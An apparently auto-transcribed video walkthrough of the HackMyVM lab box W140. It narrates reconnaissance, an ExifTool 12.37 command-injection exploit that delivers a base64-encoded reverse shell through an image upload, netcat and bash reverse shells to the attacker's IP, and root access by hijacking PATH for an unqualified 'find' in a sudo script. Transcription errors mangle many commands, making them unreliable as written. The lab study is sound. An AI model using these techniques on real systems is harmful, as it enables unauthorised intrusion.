Yo, what's going on, guys? In this video, we're going to be doing W140 from HackMyVm. This is a box sort of about solid easy. Yeah, let's get on to the video. Some suburb of my terminals here. I'm just running gain and cover my SR 10.0.0.1/24/height is 0. Doing this, we do the box 10.0.184, so do control shift Z, some remap scan. So do MMISS here for default scripts, my zero information scan out ports to the IP. Doing this, I'll do my zero verbose. Then the ports to do port 22 pin for SSH, also port 8 pin for HTTP, some service in port 80. Doing this, we do get a W140 here. We can enter email and password, and this thing, it does seem like this is just a, doesn't seem like it do everything. They have an upgrade, help, explore, and a service. We do have a, we can upload an image here, so we can just go back to this later on. I'm going to do source code. And it doesn't seem like we do anything under here. Some start by doing some more information. We're going to get Go Buster. Let me just go back. So do control shift Z, so we're doing Go Buster. So do Go Buster to remote minus you into the IP address. We'll do minus W for user show word list or buster directory listed with www.txt. We'll do such as HTML, TXT, and also PHP. Looking at the Go Buster, we have port 22, which is open for SSH. This is open SSH for Debian. Port open for HTTP, and this is Apache. Looking back at the Go Buster, we have index.html, assets, upload.php, server-side HTML, CSS, manual, and JS. So I'm going to go back to the service tab here. We do have a holidays image. We can browse, and we can actually choose a image, right? This will do for JPEG. Let's go to images here. I'll just choose this flower here. Go to copy image location. So now we can go to copy image location. Now we do see that we do have the location for .png, right? So I'm looking for that .png, so I can use wget to just get the file extension as well. So do wget. Run a file against JPEG. You'll see that this is a PNG image data. So under here, I'm going to start by going to browse. We'll go to other locations, go to backup, go to HackMyVm. We'll go down to W140, pick this PNG file, we'll go to upload. It does seem like this has been uploaded here, right? It is saved by just the same file extension, right? Or same file name. Under here, we do have an XFTool version number, 12.37. This is going to be using XFTool, which allows you to view the metadata. So if I do XFTool for 12.37, we'll search up for GitHub. We do have some command injection in XFTool before 12.38, which we do have version 12.37. I'm going to search up for a exploit. So I'm just going to go to, let's go to this .py, see how this works. So I'm just going to go to raw data. So under here, we do have a reverse shell. I'm just putting this, it is using self-oriented programming, so it does use that self.ip, also that self.port. It is a reverse shell. They do base64 encode it for that variable here, CMD, which is that CMD, for that reverse shell. And it does create the image as without an extension, right? So it does get the encoded name, base64.d, and also pipe it out to bash. And yeah, so it's basically what we're going to be uploading is going to be base64, basically. So I'll copy this. I'm just going to git clone this to this directory. cd into cv. We can do Python 3 for cv. Let's do this for minus help. This is Python 2. Yeah, it's going to be for Python 3, but I'm guessing it needs arguments, right? Yeah, so it does need an argument for IP and also the port. So do 10.0.070 on port 9001. And it's starting up, it's creating I believe it's creating a file name for us, right? Yeah, it's creating this right here to base64 decode and also pipe it out to bash. And here it just starts up a lister for 9001. So doing here, we can just go back. So go back to service, we'll go to browse, we'll go to CV. We can go to upload. We do ID. Downward to data. So do this, I'm gonna clear my terminals here. I'm gonna start by exporting my term. This is equal to extern. I clear my terminals here. I'm gonna start by checking if we do have a netcat on here, which we do have user netcat. We are under this Python script, so I do want to change to just spawn a different reverse shell, right? Or just spawn a netcat connection. So do netcat 10.0.070. We'll do some port 9001. We'll just execute bin/bash. We'll execute bin/bash. So now we can do Control-Shift-O. We'll do alt rep, then cat -vp 9001. Press enter on that. Doesn't seem like we do have E to execute, so I'm just going to go to pen test monkey. So we'll just go to reverse shell. We'll do for temp. We'll put this under here. We'll do this for 10.070 on 9001. So now we can just delete this, put this in here. We do bash -I. And now I do have my own reverse shell, right? We do ID. And now we're doing data. So I'm going to start by doing some binary numeration here. So I'll do ls-la. We do have that, the file that we did upload, which is in base64. So I'll just go to var dub. We do have this .w140 PNG. So I'm just going to run a file command against this. We do know this is PNG image data. So we do have an image here. So I'll do python 3 -m http down server port 8081. I do want to get this file here, or this image right here, so we can actually view this, right? So we get http 10.0.0. We did have the IP address for 10.0.184. We'll do some port 81. We're the file command against the W140. And we still do have that PNG image data. So I'm just going to go to files, go to other locations, go to backup. We'll go to HackMyVm, go to W140, CV. And we do have a QR code. So I'm just going to go to search up for QR code, upload. Typically we can just upload an image here. So we can just go to browse, go to backup, HackMyVm, go to W140, CV. We do have this W140. And we can copy to clipboard. I'm guessing this is going to be a password, right? I'm going to run ls-la against home, pwd. I'll just exit out of here. Okay, ls-la. We'll just get a different verse shell under here. So you can just start up our listener here. We can go to upload. We can blow this one more time. We do ID. We do have the user as ghost, so we switch user ghost. I guess that's not going to be the password, right? Let me see if I can SSH into ghost at 10.0.0.184. We do ID, and then we're in ghost. So I guess you got to make sure not to, or just to copy this, right? I would just copy it manually, paste it in here, copy it again, and put it into, you can SSH into, right? Because under here, if we try to switch user ghost, but under here, we do ID, we are under ghost, you can do bash -I, and you'll get the same thing, right? Doing this, we can do ID, and then we're in ghost. So I'm start running the sudo myself. Under here, we do have opt benz W140, so I'm cat this out. Under here, it does seem like we do have a path for bin cat, also for user bin truncate. So the truncate binary does have a valid path for user bin. Under here, we do have a find binary that does not have a valid path. If I do run a witch find, you'll see that this does have a valid path for user bin. Since we can execute this as root, we can actually just run this script here, and under find, you'll notice that it doesn't have a path. So we can actually put our own path under there to execute for that find binary. So I'm cd into /temp. I'm just going to execute or echo a /bin/bash. So we can just echo into this find binary. So we'll do chmod +6 for find. We'll do chmod 777 for find. And now this executable, right? Under here, we can start by, if I cat out the /opt-benz, I did match the same binary name, right? For find and also for find, because when we do run it, it's going to be looking for our path, and for /temp is going to be under our path, so under find, it will execute our find binary. So I'll run a sudo myself. So I'm starting to run this. I'll do sudo -u. We'll run this as root. In this case, if I do echo, all I'm going to be doing is specifying a path, right? So if I echo $path, in this case we don't have a path, so I'm going to start by specifying that path. So do sudo -u, run this as root. We can specify the path is equal to /temp, since that's where we have the binary, right? We'll do this for $path. This for $path. Then we can do this for /opt. We do this for bins. We do ID. Now I'm to root, so we can download my and cat root.txt. Okay, guys, pretty much in the video. Don't forget to like and subscribe. And now catch you guys in the next one.